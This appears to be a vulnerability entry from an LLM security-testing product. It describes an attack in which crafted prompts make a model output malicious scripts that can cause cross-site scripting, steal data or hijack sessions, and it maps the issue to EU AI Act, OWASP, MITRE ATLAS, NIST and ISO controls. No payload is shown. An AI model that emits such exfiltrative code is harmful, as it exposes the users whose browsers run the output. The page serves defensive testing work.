XSS Attack Vulnerability

Description

Severity: High

The model can be made to include exfiltration code in its output, potentially leading to Cross-Site Scripting (XSS) attacks.

This vulnerability arises when the model generates output that includes malicious scripts or code, which could then be executed in the context of a user's browser. Attackers may exploit this flaw by crafting prompts that cause the model to output harmful code, which could be used for data exfiltration, website defacement, or the spreading of malware.

Example Attack

If exploited, this vulnerability could result in serious security breaches, including unauthorized access to sensitive data, session hijacking, or the injection of malicious scripts into trusted environments. The model's output could be manipulated to perform actions like stealing credentials, redirecting users to malicious sites, or executing harmful scripts. These attacks could undermine user trust, compromise website security, and expose organizations to significant reputational and financial risks.

Remediation

Investigate and improve the effectiveness of guardrails and other output security mechanisms to prevent the model from generating code that could be executed maliciously. Strengthen the model's ability to filter and sanitize output, especially when responding to prompts that could trigger the inclusion of executable or exfiltrative code. Implement rigorous security validation on all generated content to ensure that it is free from harmful scripts or code.

Security Frameworks

EU AI Act

EU-AI-ACT-AIA-015: AIA-015: Accuracy, robustness and cybersecurity

Achieve appropriate levels of accuracy, robustness and cybersecurity, and perform consistently in those respects throughout the lifecycle. Declare accuracy levels and relevant metrics in instructions for use. Implement technical/organisational measures against errors, faults, inconsistencies, feedback loops (in continuously learning systems), and adversarial attacks such as data/model poisoning, adversarial examples, model evasion, confidentiality attacks and model flaws.

EU-AI-ACT-AIA-009: AIA-009: Risk management system

Establish, implement, document and maintain a continuous, iterative risk management system across the entire lifecycle: identification/analysis of known/foreseeable risks, estimation of risks under intended use and reasonably foreseeable misuse, evaluation of post-market monitoring data, adoption of appropriate risk-management measures including testing.

OWASP AI 2025

LLM01:2025 Prompt Injection

A Prompt Injection Vulnerability occurs when user prompts alter the LLM's behavior or output in unintended ways. These inputs can affect the model even if they are imperceptible to humans, therefore prompt injections do not need to be human-visible/readable, as long as the content is parsed by the model.

LLM02:2025 Sensitive Information Disclosure

Sensitive information can affect both the LLM and its application context. This includes personal identifiable information (PII), financial details, health records, confidential business data, security credentials, and legal documents. Proprietary models may also have unique training methods and source code considered sensitive, especially in closed or foundation models.

LLM05:2025 Improper Output Handling

Improper Output Handling refers specifically to insufficient validation, sanitization, and handling of the outputs generated by large language models before they are passed downstream to other components and systems. Since LLM-generated content can be controlled by prompt input, this behavior is similar to providing users indirect access to additional functionality.

MITRE ATLAS

AML.T0015: Evade ML Model

Adversaries can Craft Adversarial Data that prevent a machine learning model from correctly identifying the contents of the data. This technique can be used to evade a downstream task where machine learning is utilized. The adversary may evade machine learning based virus/malware detection, or network scanning towards the goal of a traditional cyber attack.

AML.T0050: Command and Scripting Interpreter

Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell.

AML.T0053: LLM Plugin Compromise

Adversaries may use their access to an LLM that is part of a larger system to compromise connected plugins. LLMs are often connected to other services or resources via plugins to increase their capabilities. Plugins may include integrations with other applications, access to public or private data sources, and the ability to execute code.

AML.T0057: LLM Data Leakage

Adversaries may craft prompts that induce the LLM to leak sensitive information. This can include private user data or proprietary information. The leaked information may come from proprietary training data, data sources the LLM is connected to, or information from other users of the LLM.

NIST AI RMF

NIST-600-MES-2.6: Measure 2.6

AI system is evaluated regularly for safety risks - as identified in the MAP function. The AI system to be deployed is demonstrated to be safe, its residual negative risk does not exceed the risk tolerance, and can fail safely, particularly if made to operate beyond its knowledge limits. Safety metrics implicate system reliability and robustness, real-time monitoring, and response times for AI system failures.

XSS Attack Vulnerability

Description

Example Attack

Remediation

Security Frameworks

EU AI Act

EU-AI-ACT-AIA-015: AIA-015: Accuracy, robustness and cybersecurity

EU-AI-ACT-AIA-009: AIA-009: Risk management system

OWASP AI 2025

LLM01:2025 Prompt Injection

LLM02:2025 Sensitive Information Disclosure

LLM05:2025 Improper Output Handling

MITRE ATLAS

AML.T0015: Evade ML Model

AML.T0050: Command and Scripting Interpreter

AML.T0053: LLM Plugin Compromise

AML.T0057: LLM Data Leakage

NIST AI RMF

NIST-600-MES-2.6: Measure 2.6

NIST-600-MES-2.7: Measure 2.7

NIST-600-MNG-4.1: Manage 4.1

ISO/IEC 42001

ISO-42001-A.6.2.4: A.6.2.4: AI System Verification and Validation

ISO-42001-A.6.2.6: A.6.2.6: AI System Operation and Monitoring

ISO-42001-A.5.4: A.5.4: Assessing AI System Impact on Individuals or Groups of Individuals

ISO-42001-A.8.4: A.8.4: Communication of Incidents

OWASP Agentic AI 2026

ASI05:2026 Unexpected Code Execution

ASI02:2026 Tool Misuse and Exploitation

Need help?